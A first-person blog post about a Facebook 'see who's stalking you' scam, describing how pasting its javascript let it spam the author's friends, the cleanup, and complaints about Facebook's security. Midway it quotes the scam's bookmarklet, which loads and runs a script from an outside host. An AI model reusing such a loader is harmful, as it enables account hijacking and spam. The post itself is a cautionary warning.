Anatomy of a Facebook Spam: See Who’s Stalking You

It wasn’t how I planned to spend a Sunday afternoon.

I saw a “see who’s stalking you” genre post on a friend’s page and thought, “hmmm, is this still around?” A quick Google search revealed SEO-focused stories at Gawker (and other sites) … where the author shows you ways to legitimately see who has most recently viewed (“stalked”) your profile.

But I did not see any new (that is, within the past few days) posts, so I thought I would check it out. Carefully, of course! Curiosity, in this case, bit into my Sunday afternoon. But I’m sharing my experience (and lessons learned) so that you can safely exercise your curiosity!

See Who’s Stalking You

First step: I saw this message (names have been redacted to protect the innocent!)

I know that this isn’t possible.

You know it’s not possible.

But I thought (naively, as it turns out) that I would actually have to authorize something before anything “bad” could happen. So I clicked the link because it went to a Facebook page (which has subsequently been deleted, once assumes by Facebook):

http://www.facebook.com/pages/Check-who-views-your-profile/172721866119962

This single act legitimizes this operation:

The content made me go “huh?” (while I laughed at the spelling – “hotest”). “But, it’s a legitimate app,” I thought. “So let’s keep exploring.”

OK, there’s a bunch of javascript. Where does it go? I pulled the URL out of the code block and tested it — it went to a page that had a link to the js file (be careful – that page still exists). Here’s an example:

javascript:(function()
{_ccscr=document.createElement(‘script’);
_ccscr.type=’text/javascript’;_
ccscr.src=’http://bdatero.info/y.js?’+(Math.random());
document.getElementsByTagName(‘head’)[0].
appendChild(_ccscr);})();

So I thought, OK, I’ll take the next step, and paste the javascript into Chrome. That act yielded this page:

I went no further. To recap:

• I did not “like” the Facebook page that contained the spam
• I did not click anything in the “Facebook Profile Viewer”

Despite my lack of overt authorization, I unwittingly gave this application “permission” to spam my friends.

The spamming came from javascript that looked something like this (txt file).

Recovering From A Mistake

The first thing I did was head over to applications to de-authorize this one (account -> privacy -> applications is at the bottom left corner). That’s when I learned that it wasn’t a real application — because it wasn’t on the app list.

Now comes the hard part: reparations.

I went to my “recently interacted” friends list (the default view when you click “edit friends” — if there is any other way to see your entire friends list, please tell me).

One-at-a-time, open friend in a new window and delete my post, if it exists.

After going through this group, I began working my way through my entire friends list … all the while, answering Tweets and FB posts advising me that I’d been hacked. Which was kinda-sorta true.

My post did not exist on every friend’s wall; it wasn’t even on every “recently interacted” friends list wall. I stopped counting at 15, but my guess is that fewer than 50 (probably a lot fewer than 50) friends were hit with the spam. One of them was, unfortunately, my sister, who also clicked. :-/

But along the way, I discovered that this thing — virus or what-have-you — is both widespread and is taking more than one form:

One of them used tiny.url in the spam; that link was terminated:

Notes To Facebook

Given how many of these apps there are, and how easy it was to hijack my account, Facebook security must have a hole in it large enough to drive an 18-wheeler through. Plus, how in the world is someone able to paste javascript into a form text box an iframe on a Facebook page?? And if those aren’t legitimate Facebook pages, how do they have Facebook URLS?

Here’s another example of a Facebook page with the javascript spam code in-page:

Dear Facebook, there’s a reason that WordPress.com doesn’t allow javascript on the site. You should take a page from their book … but not only should it not be possible to embed javascript in a Facebook page … Facebook should not be responding to commands that are executed via external javascript!

Moreover, I found it fascinating that when I was not logged into Facebook, Facebook warned me about every one of the spam links, even the one (above) that goes to a Facebook page. But when I was logged in, Facebook gave me no warning about the “Hotest” page.

Yes, I know the dangers of javascript … and because I know the dangers, and was still lulled into believing I could manage the risk, I feel a lot more charitable towards anyone who falls for the scam.

What I don’t “get” is what the spammers get out of this …. there must be something in the “surveys” that leads to a pot of gold.